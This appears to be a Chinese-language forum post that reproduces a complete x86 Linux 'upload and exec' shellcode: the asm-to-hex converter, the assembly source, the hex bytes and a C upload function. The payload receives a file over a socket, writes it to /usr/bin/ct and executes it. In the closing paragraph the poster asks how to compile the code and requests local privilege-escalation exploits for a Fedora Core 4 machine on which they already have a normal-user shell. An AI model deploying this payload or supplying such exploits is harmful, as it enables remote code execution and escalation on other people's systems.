文章作者:
UPLOAD & EXEC SHELLCODE
[1] converting asm to hex
[2] asm code
[3] hex output
[4] upload function
This is an 'upload and exec' shellcode for the x86 platform.
File has to be in executable format,
cool if you know the distribution of the target, otherwise
it is useless.
-cybertronic
[1]
/*
* convert .s to shellcode typo/teso (
typo@inferno.tusculum.edu)
*
* $ cat asm.s
* .globl cbegin
* .globl cend
* cbegin:
* "asm goes here"
* cend:
* $ gcc -Wall asm.s asm2hex.c -o out
* $ ./out
*
*/
#include
extern void cbegin();
extern void cend();
int
main ()
{
int i = 0;
int x = 0;
char* buf = ( char* ) cbegin;
printf ( "unsigned char shellcode[] =\n\"" );
for ( ; ( *buf ) && ( buf < ( char* ) cend ); buf++ )
{
if ( i++ == 16 )
i = 1;
if ( i == 1 && x != 0 )
printf ( "\"\n\"" );
x = 1;
printf ( "\\x%02x", ( unsigned char )* buf );
}
printf ( "\";\n" );
return ( 0 );
}
[2]
# append to any bind shellcode
# gcc -Wall upload-exec.s asm2hex.c -o upload-exec
# cybertronic
.globl cbegin
.globl cend
cbegin:
movl %eax,%ecx
jmp getstr
start:
popl %esi
leal (%esi),%ebx
xorl %eax,%eax
movb %al,0x0b(%esi)
pushl %esi
pushl %ecx
movb $0x05,%al
movw $0x241,%cx
movw $00777,%dx
int $0x80
movl %eax,%edi
popl %esi
read:
movl %esi,%ebx
movb $0x03,%al
leal -200(%esp),%ecx
movb $0x01,%dl
int $0x80
cmpl $0xffffffff,%eax
je end
xorl %ecx,%ecx
cmpl %eax,%ecx
je continue
leal -200(%esp),%ecx
xorl %ebx,%ebx
movl %edi,%ebx
movl %eax,%edx
movb $0x04,%al
int $0x80
jmp read
continue:
movb $0x06,%al
movl %esi,%ebx
int $0x80
movb $0x06,%al
xorl %ebx,%ebx
movl %edi,%ebx
int $0x80
xorl %esi, %esi
popl %esi
movl %esi,0x0c(%esi)
xorl %eax,%eax
movl %eax,0x10(%esi)
movb $0x0b,%al
xchgl %esi,%ebx
leal 0x0c(%ebx),%ecx
leal 0x10(%ebx),%edx
int $0x80
end:
xorl %eax,%eax
incl %eax
int $0x80
getstr:
call start
.string "/usr/bin/ct"
cend:
[3]
/*
* linux x86
* 189 bytes upload & exec shellcode by cybertronic
* cybertronic[at]gmx[dot]net
*
*/
unsigned char shellcode[] =
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68\xc7\xc7\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0"
"\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xc1\xeb\x70\x5e\x8d\x1e"
"\x31\xc0\x88\x46\x0b\x56\x51\xb0\x05\x66\xb9\x41\x02\x66\xba\xff"
"\x01\xcd\x80\x89\xc7\x5e\x89\xf3\xb0\x03\x8d\x8c\x24\x38\xff\xff"
"\xff\xb2\x01\xcd\x80\x83\xf8\xff\x74\x3e\x31\xc9\x39\xc1\x74\x13"
"\x8d\x8c\x24\x38\xff\xff\xff\x31\xdb\x89\xfb\x89\xc2\xb0\x04\xcd"
"\x80\xeb\xd3\xb0\x06\x89\xf3\xcd\x80\xb0\x06\x31\xdb\x89\xfb\xcd"
"\x80\x31\xf6\x5e\x89\x76\x0c\x31\xc0\x89\x46\x10\xb0\x0b\x87\xf3"
"\x8d\x4b\x0c\x8d\x53\x10\xcd\x80\x31\xc0\x40\xcd\x80\xe8\x8b\xff"
"\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x63\x74";
[4]
int
upload ( char* ip )
{
int s;
int fd;
char ch;
struct stat st;
s = conn ( ip );
if ( ( fd = open ( "file", O_RDONLY ) ) == -1 )
return ( 1 );
fstat ( fd, &st );
while ( st.st_size-- > 0 )
{
if ( read ( fd, &ch, 1 ) < 0 )
return ( 1 );
if ( write ( s, &ch, 1 ) < 0 )
return ( 1 );
}
close ( fd );
close ( s );
return ( 0 );
}
我要是想编译这个代码应该怎么办?想了半天还不知道怎么办,大家给看看被···这是一个linux的本地溢出的程序,还有就是我得到了一个linux(fc4)的普通权限的shell,我想提权,找了好几个本地溢出都没能成功,请推荐几个好的linux的本地溢出可以么···谢谢
[s:55]
